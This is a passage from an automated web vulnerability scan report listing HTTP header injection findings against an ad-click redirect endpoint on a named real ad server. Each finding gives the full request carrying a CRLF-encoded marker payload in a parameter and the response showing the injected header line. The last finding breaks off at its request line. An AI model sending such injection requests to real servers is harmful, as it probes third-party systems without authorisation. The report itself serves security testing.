3.71. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the cs:e request parameter is copied into the Location response header. The payload 66fce%0d%0aea3a706a45f was submitted in the cs:e parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=66fce%0d%0aea3a706a45f&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:12 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=66fce
ea3a706a45f
&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.72. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:pro parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the cs:pro request parameter is copied into the Location response header. The payload c30a3%0d%0a6e4c5584b26 was submitted in the cs:pro parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=c30a3%0d%0a6e4c5584b26&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=asnEN7xZduHZbPMx3snRZaKCVpj0fZbXPC329JQ48mlSMLXCUpGixImpnsfpFQbOJppT6O4n16J4YyQvXCPVuKiZbtdZdpZaYvfYi0UEl7VA5vqcc8exZci1rx7VYVM5JmdMcZco29l3IIXZbIGMl2WpA88RAexDbGPr8VQVZbK9reQYrcyDxD95yfIqZaZaEUF5SmIFDBWefkOZdll7reK9ZdwCABWm63sabBWYqTdZd3YlvEAcpSRYbogmfxmbpyGAaCeZb0uspaES9u0qaJZauZaWA8K8apK4Jg2AqAwGGfu9UcnZc4Lf8Y0M38hUeZdHKwKWfNwmourin30o4fK6ZdSmIPlGNds47lRlg1qurBx0XTZbHgOMlpJkZclt3CYuNoVFQMZbm9JnSsQ9ZbuWpZaB0x614VlnZdG7wO02wvZbdtHacxr6ZdgQZal45TZdxDMRsYyFXVFZcZbU0mdDWPUmYd92t8suYHoZayMAGb2QPnZbBE6SOaZdZbqmxRMil6QZcsm15JrvEAZcWxdcsme2LD1ZdRC6mXfFhjtRZbAnY1rWSF1tITejqjMxt1vFugjsr9pByQCGNZbRNEWJSFMnDsIHtCo; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:55 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=c30a3
6e4c5584b26
&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.73. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migAgencyId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migAgencyId request parameter is copied into the Location response header. The payload e521c%0d%0aa2e49ee6de7 was submitted in the migAgencyId parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=e521c%0d%0aa2e49ee6de7&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:41 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=e521c
a2e49ee6de7
&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.74. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migRandom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migRandom request parameter is copied into the Location response header. The payload 15bea%0d%0a72b9d1a767d was submitted in the migRandom parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=15bea%0d%0a72b9d1a767d&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:28 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=15bea
72b9d1a767d
&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.75. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migSource parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migSource request parameter is copied into the Location response header. The payload 31b5f%0d%0a1d727e3388a was submitted in the migSource parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=31b5f%0d%0a1d727e3388a&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:42 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=31b5f
1d727e3388a
&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.76. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migTrackDataExt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migTrackDataExt request parameter is copied into the Location response header. The payload ee931%0d%0acbd419af417 was submitted in the migTrackDataExt parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=ee931%0d%0acbd419af417&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:11 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=ee931
cbd419af417
&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.77. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migTrackFmtExt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migTrackFmtExt request parameter is copied into the Location response header. The payload 7de0b%0d%0af87942a728d was submitted in the migTrackFmtExt parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=7de0b%0d%0af87942a728d&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:55 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=7de0b
f87942a728d
&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.78. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migUnencodedDest parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migUnencodedDest request parameter is copied into the Location response header. The payload 4189b%0d%0a7791b4f74c2 was submitted in the migUnencodedDest parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=4189b%0d%0a7791b4f74c2&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:12 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=4189b
7791b4f74c2
&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.79. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 1349f%0d%0a72cb2b1477e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?1349f%0d%0a72cb2b1477e=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:05 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?1349f
72cb2b1477e
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.80. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 124dd%0d%0a93ae5762393 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/?124dd%0d%0a93ae5762393=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:18 GMT;
Content-Type: text/html
Location: ?124dd
93ae5762393
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.81. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload 7ac8c%0d%0a46bc1d03be4 was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/;ord=7ac8c%0d%0a46bc1d03be4 HTTP/1.1
